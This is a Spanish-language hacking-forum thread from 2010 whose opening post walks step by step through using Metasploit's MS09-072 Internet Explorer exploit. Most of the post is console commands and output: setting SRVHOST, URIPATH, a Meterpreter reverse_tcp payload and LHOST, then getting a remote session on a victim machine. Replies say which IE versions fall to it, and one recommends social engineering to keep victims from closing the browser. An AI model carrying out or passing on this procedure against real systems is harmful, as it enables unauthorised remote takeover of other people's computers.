[MetaSploit] MS09-072 StyleObject (Internet Explorer)

Foro de elhacker.net

Seguridad Informática

Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)

[MetaSploit] MS09-072 StyleObject (Internet Explorer)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: [MetaSploit] MS09-072 StyleObject (Internet Explorer) (Leído 4,164 veces)

[L]ord [R]NA

Desconectado

Mensajes: 1.508

El Dictador y Verdugo de H-Sec

[MetaSploit] MS09-072 StyleObject (Internet Explorer)

« en: 13 Febrero 2010, 20:02 »

ms09_072_style_object by R.N.A.

Detalles de la vulnerabilidad: Esta vulnerabilidad se basa en la posibilidad de ejecutar codigo remotamente si un usuario visita una pagina web especialmente dise~ada utilizando Internet Explorer. El error ocurre en el manejo de Style Objects a travez de la funcion de javascript "document.getElementsByTagName" permitiendo a un atacante corromper la memoria y ejecutar codigo remotamente.

1) Seleccionamos el exploit, en nuestro caso ms09_072_style_object.

Código:

   _ _
   _ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
   |_|

   =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 508 exploits - 244 auxiliary
+ -- --=[ 193 payloads - 23 encoders - 8 nops
   =[ svn r8472 updated today (2010.02.12)

msf > use exploit/windows/browser/ms09_072_style_object
msf exploit(ms09_072_style_object) > Interrupt: use the 'exit' command to quit
msf exploit(ms09_072_style_object) >

2) Verificamos las opciones que son requeridas:

Código:

msf exploit(ms09_072_style_object) > show options

Module options:

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   SRVHOST 0.0.0.0 yes The local host to listen on.
   SRVPORT 8080 yes The local port to listen on.
   SSL false no Negotiate SSL for incoming connections
   SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH no The URI to use for this exploit (default is random)

3) Modificamos las partes importantes para poder realizar la prueba de esta vulnerabilidad (SRVHOST y URIPATH)

Código:

msf exploit(ms09_072_style_object) > set SRVHOST 192.168.10.102
SRVHOST => 192.168.10.102
msf exploit(ms09_072_style_object) > set URIPATH /
URIPATH => /

4) Vemos cuales payloads son compatibles con el exploit:

Código:

msf exploit(ms09_072_style_object) > show payloads msf exploit(ms09_072_style_object)

5) Seleccionamos el payload que mas nos convenga para lo que queremos hacer, en mi caso windows/meterpreter/reverse_tcp y completamos la opcion LHOST con nuestra direccion IP.

Código:

msf exploit(ms09_072_style_object) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms09_072_style_object) > set LHOST 192.168.10.102
LHOST => 192.168.10.102

6) Ahora ejecutamos el exploit y esperamos por la conexion

Código:

msf exploit(ms09_072_style_object) > exploit
[*] Exploit running as background job.
msf exploit(ms09_072_style_object) >
[*] Started reverse handler on 192.168.10.102:4444
[*] Using URL: http://192.168.10.102:8080/
[*] Server started.

7) Ahora se conecta el ordenador vulnerable y obtenemos una sesion.

Código:

[*] Entering heap spray mode for 192.168.10.104:58739
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.10.102:4444 -> 192.168.10.104:58739)


« Última modificación: 13 Febrero 2010, 20:07 por El Pollo Profeta »	En línea

H-Sec... Exclusividad Ante Todo (Nos reservamos el Derecho a Admision)

alexkof158

Desconectado

Mensajes: 405

LOL

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #1 en: 13 Febrero 2010, 22:27 »

otra manera de conseguir una seesion esta bueno , pero podrias explicarnos bajo que entornos se exploota esta vulnerabilidad????


« Última modificación: 15 Febrero 2010, 08:33 por alexkof158 »	En línea

Shell Root

Desconectado

Mensajes: 2.400

Alex Jurado

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #2 en: 13 Febrero 2010, 22:31 »

Cita de: alexkof158 en 13 Febrero 2010, 22:27

otra manera de conseguir un exploit

No consigue un exploit, sino una Session del Meterpreter

Cita de: alexkof158 en 13 Febrero 2010, 22:27

pero podrias explicarnos bajo que entornos se exploota esta vulnerabilidad????

Con entornos te referis a...?
Para más información, usa el comando info, seleccionando antes el exploit.

Saludos!


	En línea

---

[L]ord [R]NA

Desconectado

Mensajes: 1.508

El Dictador y Verdugo de H-Sec

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #3 en: 13 Febrero 2010, 23:44 »

Cita de: alexkof158 en 13 Febrero 2010, 22:27

otra manera de conseguir un exploit esta bueno , pero podrias explicarnos bajo que entornos se exploota esta vulnerabilidad????

Segun la referencia MS09-072 en Microsoft son vulnerables todos los Internet Explorer pero solo pude conseguir acceso con MetaSploit a un ordenador con Internet Explorer 6 y 7. y los exploit los trae el metasploit por lo tanto esta es una manera de conseguir acceso, no un exploit.


	En línea

H-Sec... Exclusividad Ante Todo (Nos reservamos el Derecho a Admision)

alexkof158

Desconectado

Mensajes: 405

LOL

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #4 en: 15 Febrero 2010, 08:32 »

uy sikas se me enredaron las palabras sorry y gracias por responde editooo...


	En línea

PHAMTOM

Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #5 en: 1 Marzo 2010, 17:04 »

Este exploit, es parecido al ie_aurora,que proboca una corrupcion de memoria con javascript,permitiendo en ultima instancia tener acceso remotamente, pero ! , creo que este exploit es menos detectable,ahora voy a probarlo en mi maquina virtual, el tema con estos exploits locales,son que la sección tarda en abrir , tarda mucho en tranferir la sección, y el ~~usuario(victimario)~~ tiene el tiempo suficiente,para finalizar la tarea del internet explorer y asi terminar con el exploit.

Gracias por la información.

Saludos


« Última modificación: 1 Marzo 2010, 17:08 por MOTMAHP »	En línea

Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más

[L]ord [R]NA

Desconectado

Mensajes: 1.508

El Dictador y Verdugo de H-Sec

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #6 en: 10 Marzo 2010, 22:56 »

Cita de: PHAMTOM en 1 Marzo 2010, 17:04

Cuando para obtener una sección se debe de tardar un tiempo se debe de hacer uso de ingenieria social


	En línea

H-Sec... Exclusividad Ante Todo (Nos reservamos el Derecho a Admision)

S1dD3xt35

Desconectado

Mensajes: 34

La respuesta esta siempre esta

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #7 en: 15 Marzo 2010, 09:22 »

saludos:) muy buen tutorial pero tengo un pequeno ala hora de ejecutar el IE7 no se me crea la conexión con la otra pc $:-\$ solo se queda en esa parte

Código:

[*] Entering heap spray mode for 172.16.1.32:56697

si alguien me puede decir por que lo agradeceria mucho


	En línea

illera88

Desconectado

Mensajes: 403

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #8 en: 22 Marzo 2010, 06:36 »

No entiendo... Quien es la víctima y quien el "hacker"???
Porque solo utilizas esta IP 192.168.10.102....

Un saludo


	En línea

Shell Root

Desconectado

Mensajes: 2.400

Alex Jurado

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #9 en: 22 Marzo 2010, 18:36 »

y QUÉ si lo está realizando de forma local?


	En línea

---

illera88

Desconectado

Mensajes: 403

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #10 en: 24 Marzo 2010, 07:04 »

Cita de: Alex@ShellRoot en 22 Marzo 2010, 18:36

y QUÉ si lo está realizando de forma local?

eing???


	En línea

Shell Root

Desconectado

Mensajes: 2.400

Alex Jurado

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #11 en: 24 Marzo 2010, 15:50 »

LoL!... Té pregunto, que pasa si lanza y ejecuta el exploit en una misma P.C!


	En línea

---

MagnoBalt

Desconectado

Mensajes: 58

Los Buenos Artitas Copian, los Grandes Roban

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #12 en: 24 Marzo 2010, 19:48 »

Hola illera88 , creo que antes de preguntar deberias haber leido alguna informacion de metasploit y aun algo mas importante probar, sentarte y probar, crearte un labs que puede ser instalando una virtual machione en tu maquina, o una LAN en tu casa con otra pcs si tenes la posibilidad de conseguir una, y seguramente no hubieras preguntado esto

Citar

No entiendo... Quien es la víctima y quien el "hacker"???
Porque solo utilizas esta IP 192.168.10.102....

Tan solo te das cuenta quien es el Hacker y quien es la victima con esta leyenda

Citar

Entering heap spray mode for 192.168.10.104:58739
Sending stage (723456 bytes)
Meterpreter session 1 opened (192.168.10.102:4444 -> 192.168.10.104:58739)

Saludos


	En línea

[L]ord [R]NA

Desconectado

Mensajes: 1.508

El Dictador y Verdugo de H-Sec

Re: [MetaSploit] MS09-072 StyleObject (Internet Explorer)

« Respuesta #13 en: 24 Marzo 2010, 23:52 »

Cita de: illera88 en 22 Marzo 2010, 06:36

No entiendo... Quien es la víctima y quien el "hacker"???
Porque solo utilizas esta IP 192.168.10.102....

Un saludo

Me explico... mi ip desde la cual ejecutaba Metasploit 192.168.10.102, debido a que uso reversee_tcp de meterpreter debo dar la direccion desde la cual estare esperando la sesion, tomo la misma 192.168.10.102... ahora un equipo se conecta, en el caso de cuando hice la PoC fue 192.168.10.104, espero haber aclarado tus dudas.


	En línea

H-Sec... Exclusividad Ante Todo (Nos reservamos el Derecho a Admision)

Páginas: [1]

Ir a: